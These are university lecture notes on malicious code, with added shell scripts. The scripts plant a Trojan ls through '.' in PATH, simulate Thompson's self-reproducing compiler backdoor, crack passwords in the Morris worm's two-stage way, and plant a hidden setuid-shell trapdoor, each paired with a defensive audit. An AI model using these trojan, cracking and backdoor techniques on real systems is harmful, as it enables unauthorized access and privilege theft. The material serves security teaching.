Spring 2005, Syracuse University Lecture Notes for CIS/CSE 785: Computer Security
Malicious Code
(1) Kinds of Malicious Code
v Trojan horse
v Virus
v Logic bomb, time bomb
v Trapdoor, backdoor
v Worm
(2) Trojan Horse
Trojan horse: a program that, in addition to its apparent (primary) effect, has a second, non-obvious malicious effect.
v ls Trojan horse.
Ø If somebody visits your directory, is it possible to trick the user into running a Trojan horse program?
Ø Yes, if "." (the current directory) comes before /bin in the victim's PATH environment variable: put an executable named ls in your directory, and when the visitor types ls there, the shell finds and runs your ./ls before /bin/ls. The Trojan horse can do its damage and then run the real ls, so the victim sees a normal listing.
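The script below is an added example, not code from the lecture: it plants the ls Trojan horse described above in a scratch directory, shows which program the victim's shell actually runs, and ends with the check an administrator would run on a PATH value. The temp directory, the log file the Trojan horse writes, and the function names are assumptions for the demo; the Trojan horse only records who ran it before handing over to the real ls.

```sh
#!/bin/sh
# Added example, not from the lecture: the "." in PATH trick end to end.
# The attacker plants an executable named "ls" in a directory they control.
# A victim whose PATH starts with "." and who types "ls" inside that
# directory runs the planted program instead of /bin/ls.

# Create the booby-trapped directory (a temp dir, assumed writable and
# executable); prints its path.
plant_trojan_ls() {
    trap_dir=$(mktemp -d)
    # Resolve the genuine ls through a PATH without "." so the Trojan horse
    # can hand over to it and look harmless.
    real_ls=$(PATH=/usr/bin:/bin command -v ls)
    cat > "$trap_dir/ls" <<EOF
#!/bin/sh
# Trojan horse: the hidden secondary effect first (here only a log line;
# the trapdoor section shows what a real one would plant) ...
echo "trojan ls run by \$(id -un) in \$(pwd)" >> "$trap_dir/.log"
# ... then the expected primary effect, so the victim sees a normal listing.
exec "$real_ls" "\$@"
EOF
    chmod +x "$trap_dir/ls"
    printf '%s\n' "$trap_dir"
}

# Which program does the shell run for "ls" from inside DIR ($1) with PATH
# set to $2?  command -v performs the same search the shell does.
resolve_ls_in() {
    ( cd "$1" || exit 1; PATH=$2; command -v ls )
}

# Simulate the victim: cd into DIR with "." first in PATH and type ls.
# Prints the Trojan horse's log afterwards.  The listing the victim saw is
# discarded here; it looked normal, and .log is a dotfile that a plain ls
# would not show anyway.
victim_visits() {
    ( cd "$1" || exit 1; PATH=.:/usr/bin:/bin; ls >/dev/null )
    cat "$1/.log" 2>/dev/null
}

# The check a defender wants: does a PATH value ever search the current
# directory?  That is an explicit "." or an empty element (leading ":",
# trailing ":" or "::"), which POSIX shells treat as ".".
path_has_cwd() {
    case ":$1:" in
        *:.:*|*::*) return 0 ;;
        *)          return 1 ;;
    esac
}

# Walk through the whole scenario and clean up; call it by hand after
# sourcing this file.
demo_path_trojan() {
    d=$(plant_trojan_ls)
    echo "victim's ls resolves to: $(resolve_ls_in "$d" .:/usr/bin:/bin)"
    victim_visits "$d"
    path_has_cwd "$PATH" && echo "WARNING: your own PATH searches ."
    rm -rf "$d"
}
```

The fix is simply never to have "." or an empty element in PATH (put "." last if it must be there at all, and type ./prog explicitly); path_has_cwd is the one-line audit for login scripts.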
v Ken Thompson's famous Trojan horses
Ø "Reflections on Trusting Trust", his Turing Award lecture (Communications of the ACM, 1984).
Ø Goal: add a Trojan horse to the login program, so that a special password lets one log into the system as any user. However, the Trojan horse should be difficult to detect and to remove.
Ø Approach 1: change the login binary.
§ This is easy to fix: just recompile it from login.c.
§ What about also changing login.c? That is easy to detect if somebody reads the source. Q: how can it be made more difficult to detect?
Ø Approach 2: change compiler.c so that, whenever the compiler compiles login.c, it automatically adds the Trojan horse to the login binary; then change login.c back to normal.
§ What if somebody reads compiler.c? The Trojan horse in compiler.c can be detected. They can get another (clean) copy of compiler.c and compile that.
Ø Approach 3: change compiler.c so that it adds the Trojan horse when it compiles login.c, and also adds both Trojan horses (this one included) when it compiles compiler.c itself. Compile the compiler once with this change, then change compiler.c back to normal.
§ The Trojan horses are now built into the compiler binary only.
§ None of the source files contain any Trojan horse; the Trojan horses are added by the compiler. Recompiling the clean compiler.c with the trojaned compiler produces another trojaned compiler, so the Trojan horse survives a rebuild. Unless somebody inspects the compiler binary itself, it is difficult to detect.
§ To remove the Trojan horse, recompiling is not enough: one needs a compiler binary that was not itself built by the trojaned compiler (for example, a compiler written or built independently).
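The following script, an added example and not Thompson's code, simulates Approach 3 with toy "sources" that are shell scripts and a toy "compiler" that merely copies a source to its output. The marker comments ("# program: login", "# program: compiler"), the special password "xyzzy", and the file names are assumptions for the demo. Both source files are clean; only the compiler binary cc carries the Trojan horses, and it reproduces them when asked to rebuild the compiler from the clean source.

```sh
#!/bin/sh
# Added example (not Thompson's code): a toy simulation of Approach 3.
# "Source" files are shell scripts and the "compiler" is a script that turns
# a source file into an executable by copying it.  The trojaned compiler
# recognises two inputs by a marker comment and miscompiles both.

# Write the clean sources and the trojaned compiler binary into DIR ($1).
setup_sources() {
    cat > "$1/login.c" <<'EOF'
#!/bin/sh
# program: login
# usage: login USER PASSWORD   (toy: the only real password is "secret")
if [ "$2" = "secret" ]; then echo "welcome $1"; exit 0; fi
echo "login incorrect"; exit 1
EOF
    cat > "$1/compiler.c" <<'EOF'
#!/bin/sh
# program: compiler
# usage: compiler SOURCE OUTPUT   (toy compiler: the "binary" is a copy)
cp "$1" "$2"; chmod +x "$2"
EOF
    # What Approach 3 leaves behind: compiler.c was patched, compiled once,
    # and restored.  Only this binary still carries the two Trojan horses.
    cat > "$1/cc" <<'EOF'
#!/bin/sh
# program: compiler (trojaned binary; its patched source no longer exists)
if grep -q '^# program: login' "$1"; then
    # Trojan 1: when compiling login.c, also accept the special password.
    sed 's/= "secret" ]/= "secret" ] || [ "$2" = "xyzzy" ]/' "$1" > "$2"
elif grep -q '^# program: compiler' "$1"; then
    # Trojan 2: when compiling compiler.c, emit a copy of myself (Trojans
    # included) instead of a faithful translation of the clean source.
    cat "$0" > "$2"
else
    cp "$1" "$2"                        # everything else compiles honestly
fi
chmod +x "$2"
EOF
}

# Rebuild the compiler from its clean source with the existing compiler,
# then build login from its clean source with the rebuilt compiler.
rebuild_world() {
    sh "$1/cc"  "$1/compiler.c" "$1/cc2"
    sh "$1/cc2" "$1/login.c"    "$1/login"
}

# Run the freshly built login as USER ($2) with PASSWORD ($3); prints its reply.
run_login() {
    sh "$1/login" "$2" "$3" || true
}

# For contrast: run the clean compiler source directly (as if a trustworthy
# compiler binary existed) and build login with it.
build_login_honestly() {
    sh "$1/compiler.c" "$1/login.c" "$1/login_clean"
    sh "$1/login_clean" "$2" "$3" || true
}

# How many times does the special password appear in the sources?  Expect 0:
# reading the source tree reveals nothing.
backdoor_in_sources() {
    cat "$1/login.c" "$1/compiler.c" | grep -c xyzzy || true
}
```

After rebuild_world the rebuilt compiler cc2 is byte for byte the trojaned cc, and the login it builds accepts "xyzzy", although neither login.c nor compiler.c mentions that password; building login with compiler.c run directly gives a login that rejects it.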
(3) Virus
v A virus must be activated by being executed. There are various ways to get activated:
Ø Running an infected program
Ø Opening an e-mail attachment (Melissa, a Word macro virus; the Love Bug, a VBScript attachment)
Ø Merely reading (previewing) an e-mail (BubbleBoy virus, which ran a script embedded in the HTML message)
v How a virus attaches itself to its host:
Ø Appended viruses: the virus code is added to the end of the program and the entry point is redirected to it
Ø Viruses that surround a program: run before and after the original program
Ø Boot sector viruses: placed in the disk's boot sector, so they run before the operating system
v Macro viruses
Ø A macro is a sequence of instructions that is interpreted by an application (e.g. Microsoft Word), rather than executed directly by the CPU; a macro virus lives inside a document and runs when the document is opened.
Ø Melissa virus (1999): a Word macro that mailed the infected document to the first 50 entries of the victim's Outlook address book.
v Solutions
Ø There is no general cure for viruses: no program can decide, for every input program, whether it is a virus.
Ø Virus checkers are effective against known viruses only (they match signatures).
v Truths and misconceptions about viruses
Ø Viruses can infect systems other than PCs running MS-DOS/Windows.
Ø Q: why do so few viruses exist for Unix?
Ø Viruses can appear in data files: a Microsoft Word document is "data" to the operating system, yet a Word macro virus inside it is executed when the document is opened.
(4) Worms
v History of the Internet Worm
Ø Nov. 2, 1988, Robert T. Morris Jr.
Ø His father, Robert Morris Sr. (then at the NSA), and Ken Thompson wrote a classic paper on Unix password security in 1979.
Ø Flaw in the worm: it did not reliably check whether another copy of the worm was already running on a host, so machines were infected many times over and ground to a halt.
v What made the worm a successful attack:
Ø Difference from a virus: it propagates by itself over the network.
Ø Bug in fingerd: a buffer overflow (gets() into a fixed-size buffer).
Ø Backdoor in sendmail: DEBUG mode.
Ø Took advantage of trusted-host mechanisms (rsh/rexec with .rhosts and hosts.equiv), which were meant to simplify resource sharing between machines.
Ø Weak passwords: password guessing.
§ The worm carries a short list of common passwords (432 words): e.g. "guest", "passwords", "aaa", "help", "coffee", "coke", etc.
§ If the short list fails, it uses the system dictionary (/usr/dict/words).
Ø Disguise:
§ remove all traces from disk (delete its own files once loaded)
§ keep all its files in memory only, encrypted
§ change its process name periodically (it called itself sh) and re-fork to get a new process id
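An added example (not the worm's code) of the two-stage password guessing described above, written as a small audit script. cksum stands in for the crypt(3) hashes in /etc/passwd that the worm attacked (the worm carried its own fast reimplementation of crypt); the password file, the dictionary file, and the account names are constructed for the demo. The same logic doubles as a proactive check that rejects a new password the worm would have guessed.

```sh
#!/bin/sh
# Added example (not the worm's code): the worm's two-stage password
# guessing as a small audit tool.  cksum is a toy stand-in for crypt(3);
# everything else (accounts, dictionary) is constructed for the demo.

# Stage 1: a short built-in list of common passwords.  The worm carried
# 432 of them; these are the ones quoted in the lecture.
SHORT_LIST='guest
passwords
aaa
help
coffee
coke'

# Hash a candidate the same way the stored hash was produced (toy hash).
hash_pw() {
    printf '%s' "$1" | cksum | cut -d' ' -f1
}

# Read candidate passwords from stdin, one per line, and compare each
# against hash $1.  Prints the match and returns 0, or returns 1.
crack() {
    while IFS= read -r word; do
        [ -n "$word" ] || continue
        if [ "$(hash_pw "$word")" = "$1" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done
    return 1
}

# The worm's strategy: stage 1 (short list), and only if that fails,
# stage 2 (the system dictionary, here the file named in $2).
guess_password() {
    printf '%s\n' "$SHORT_LIST" | crack "$1" && return 0
    crack "$1" < "$2"
}

# Constructed /etc/passwd-style file "user:hash".  In 1988 the real file was
# world readable, which is what made offline guessing possible.
make_passwd_file() {
    {
        printf 'sdf:%s\n'  "$(hash_pw coffee)"         # in the short list
        printf 'rtm:%s\n'  "$(hash_pw wombat)"         # in the dictionary only
        printf 'ches:%s\n' "$(hash_pw 'Tr0ub4dor&3')"  # in neither
    } > "$1"
}

# The worm's outer loop over every account of passwd file $1 with
# dictionary $2; prints "user password" for each account it cracks.
audit_passwd() {
    while IFS=: read -r user hash; do
        pw=$(guess_password "$hash" "$2") && printf '%s %s\n' "$user" "$pw"
    done < "$1"
    return 0
}

# The defender's use of the same code: reject a new password ($1) that the
# two-stage attack would recover (dictionary file $2).
is_weak_password() {
    guess_password "$(hash_pw "$1")" "$2" >/dev/null
}
```

Running audit_passwd on the constructed file cracks sdf (stage 1) and rtm (stage 2) and gives up on ches; is_weak_password is the check to put in front of passwd so that the first two could never have been chosen.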
v More malicious code: Code Red
Ø July 2001
Ø Targeted Microsoft's Internet Information Server (IIS) web server
Ø Exploited a buffer overflow in the IIS Indexing Service ISAPI extension (idq.dll), triggered by a single crafted HTTP GET request
(5) Trapdoors
v Examples of trapdoors
Ø A special account that bypasses the password check
Ø A special input sequence that bypasses access control
Ø Worm: sendmail's DEBUG mode let a remote sender name a program as the mail recipient, so the worm could run a program on the target
v Another example: what is a fast way to gain somebody's full privileges, permanently, when he/she leaves the terminal unattended for a short period of time?
Ø % cp /bin/sh /tmp/.xxsh
Ø % chmod 4777 /tmp/.xxsh
Ø Mode 4777 sets the setuid bit and makes the copy world-executable: anyone who later runs /tmp/.xxsh gets a shell with the victim's effective uid, and the leading "." hides the file from a plain ls.
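An added example, not from the lecture: the two commands above confined to a scratch directory (so no root and no /tmp are needed), followed by the audit an administrator runs to find such a trapdoor and the command that disarms it. The directory and function names are assumptions for the demo.

```sh
#!/bin/sh
# Added example (not from the lecture): plant the setuid-shell trapdoor in a
# scratch directory, then run the audit that finds it.  No root is needed:
# the setuid bit may be set on a file you own; it then confers your own uid.

# The attacker's two commands, confined to DIR ($1).  Mode 4777 = setuid (4)
# plus rwx for owner, group and world (777): whoever runs the copy gets a
# shell with the file owner's effective uid.
plant_setuid_shell() {
    cp "$(PATH=/bin:/usr/bin command -v sh)" "$1/.xxsh"
    chmod 4777 "$1/.xxsh"
}

# The administrator's check: list setuid and setgid regular files under DIR.
# On a real system run it from / with -xdev and diff the output against a
# known-good baseline; a copy of a shell or editor is the trapdoor.
find_setuid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \)
}

# Remediation: strip the setuid/setgid bits from FILE ($1), then find out
# who created it and when.
disarm_setuid() {
    chmod u-s,g-s "$1"
}
```

Two caveats a practitioner should know: bash resets its effective uid to the real uid on startup unless run with -p, so against a modern shell the attacker has to invoke the copy with -p (or copy a shell that does not reset); and mounting /tmp with the nosuid option defeats the trick regardless. The find audit reports the file in either case.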
v Causes of trapdoors:
Ø Forgotten: debugging hooks the developer meant to remove
Ø Intentionally left in the program for testing
Ø Intentionally left in for maintenance
Ø Intentionally left in as a covert means of access to the component
Wenliang Du Malicious Code: Page 1 of 3 4/2/2005